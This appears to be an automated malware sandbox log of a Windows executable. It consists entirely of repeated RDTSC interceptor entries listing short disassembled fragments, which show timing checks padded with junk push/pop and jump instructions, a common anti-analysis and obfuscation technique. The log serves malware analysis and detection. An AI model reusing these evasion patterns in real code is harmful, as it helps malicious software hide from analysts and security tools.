Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E4F722 second address: E4F73E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FD5735h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E4F73E second address: E4F77C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jns 00007F17B0EA9AB6h 0x0000000c popad 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007F17B0EA9AC9h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F17B0EA9AC3h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E4F77C second address: E4F79D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FD5737h 0x00000007 jl 00007F17B0FD5726h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E4F79D second address: E4F7AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9ABBh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA7421 second address: EA7432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F17B0FD572Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA7A30 second address: EA7A88 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnp 00007F17B0EA9AB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F17B0EA9ABEh 0x00000012 pushad 0x00000013 jmp 00007F17B0EA9AC5h 0x00000018 jno 00007F17B0EA9AB6h 0x0000001e popad 0x0000001f popad 0x00000020 pushad 0x00000021 jmp 00007F17B0EA9AC7h 0x00000026 jbe 00007F17B0EA9ABCh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA7BF5 second address: EA7C23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FD572Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F17B0FD573Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA7C23 second address: EA7C4A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F17B0EA9ACFh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA7C4A second address: EA7C4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA7DAC second address: EA7DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA7DB2 second address: EA7DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA7DBB second address: EA7DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA7DBF second address: EA7DC9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F17B0FD5726h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA7DC9 second address: EA7DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 jg 00007F17B0EA9AB6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA9A11 second address: EA9A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA9A1C second address: EA9A50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9ABFh 0x00000007 jmp 00007F17B0EA9AC9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EA9A50 second address: EA9A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E23D77 second address: E23D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17B0EA9ABDh 0x00000009 popad 0x0000000a jmp 00007F17B0EA9AC4h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E23D9D second address: E23DA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E23DA3 second address: E23DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E23DA9 second address: E23DAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EAF2F5 second address: EAF312 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0EA9AC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EAE064 second address: EAE068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EAE1BB second address: EAE1BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EAE7B5 second address: EAE7D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FD5733h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EAE7D0 second address: EAE7D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EAEFA3 second address: EAEFA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EAEFA8 second address: EAEFAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EAEFAE second address: EAEFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB4EEE second address: EB4EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB4EF2 second address: EB4EF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB3BC9 second address: EB3BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a jnc 00007F17B0EA9AB6h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F17B0EA9AC1h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB3D22 second address: EB3D26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB3D26 second address: EB3D40 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F17B0EA9AB6h 0x00000008 jp 00007F17B0EA9AB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jl 00007F17B0EA9ABEh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB3E7D second address: EB3E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB3E83 second address: EB3E87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB42B7 second address: EB42C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F17B0FBC26Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB4577 second address: EB457B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB457B second address: EB4583 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB4583 second address: EB4588 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB4CEB second address: EB4D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F17B0FBC26Bh 0x0000000b jg 00007F17B0FBC285h 0x00000011 jmp 00007F17B0FBC26Eh 0x00000016 jmp 00007F17B0FBC271h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB4D25 second address: EB4D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB4D2B second address: EB4D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB4D2F second address: EB4D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB90B1 second address: EB90D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17B0FBC274h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB90D0 second address: EB90D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB8907 second address: EB890D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB890D second address: EB8911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB8BBD second address: EB8BDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F17B0FBC26Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EB8BDA second address: EB8BF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F17B0CB1431h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EBB52A second address: EBB52E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EBB52E second address: EBB532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E1D171 second address: E1D175 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E1D175 second address: E1D184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F17B0CB1426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E1D184 second address: E1D19A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F17B0FBC266h 0x0000000a jmp 00007F17B0FBC26Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E1D19A second address: E1D1A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F17B0CB142Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC0761 second address: EC0791 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F17B0FBC26Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jo 00007F17B0FBC26Ch 0x00000011 jng 00007F17B0FBC266h 0x00000017 push edx 0x00000018 jns 00007F17B0FBC266h 0x0000001e pop edx 0x0000001f pushad 0x00000020 jnc 00007F17B0FBC266h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC0BBC second address: EC0BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC0BC0 second address: EC0BC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC0BC4 second address: EC0BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC5D6E second address: EC5D74 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC5032 second address: EC503A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC503A second address: EC503E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC503E second address: EC5042 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC5042 second address: EC507D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17B0FBC26Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007F17B0FBC26Eh 0x00000019 jl 00007F17B0FBC270h 0x0000001f jmp 00007F17B0FBC26Ah 0x00000024 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC507D second address: EC5096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F17B0CB1426h 0x0000000a jmp 00007F17B0CB142Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC5096 second address: EC50C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F17B0FBC273h 0x0000000f jmp 00007F17B0FBC26Eh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC561E second address: EC5632 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F17B0CB1436h 0x00000008 jmp 00007F17B0CB142Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC575A second address: EC576E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F17B0FBC266h 0x00000008 jns 00007F17B0FBC266h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC576E second address: EC5772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC5772 second address: EC577C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EC591B second address: EC5938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0CB142Bh 0x00000009 jmp 00007F17B0CB142Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ECB2BB second address: ECB2E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F17B0FBC266h 0x0000000f jmp 00007F17B0FBC276h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ECAAE9 second address: ECAAED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ECAAED second address: ECAB0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F17B0FBC277h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E25813 second address: E25817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: E25817 second address: E2581D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED0CEC second address: ED0CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F17B0CB1426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED1183 second address: ED1193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F17B0FBC268h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED1193 second address: ED119D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F17B0CB1426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED119D second address: ED11A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED11A1 second address: ED11AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED1F0F second address: ED1F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17B0FBC26Eh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F17B0FBC275h 0x00000010 jp 00007F17B0FBC266h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED1F40 second address: ED1F56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F17B0CB142Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED1F56 second address: ED1F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED1F64 second address: ED1F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F17B0CB1426h 0x0000000a jne 00007F17B0CB1426h 0x00000010 popad 0x00000011 jno 00007F17B0CB143Fh 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED2279 second address: ED227F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED227F second address: ED228C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007F17B0CB1426h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED228C second address: ED22B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f js 00007F17B0FBC266h 0x00000015 jne 00007F17B0FBC266h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jg 00007F17B0FBC266h 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED22B2 second address: ED22B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED255F second address: ED2563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: ED2829 second address: ED286A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F17B0CB1431h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F17B0CB1434h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ebx 0x00000015 jmp 00007F17B0CB142Eh 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: EDC291 second address: EDC2BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC272h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F17B0FBC278h 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 jg 00007F17B0FBC26Eh 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
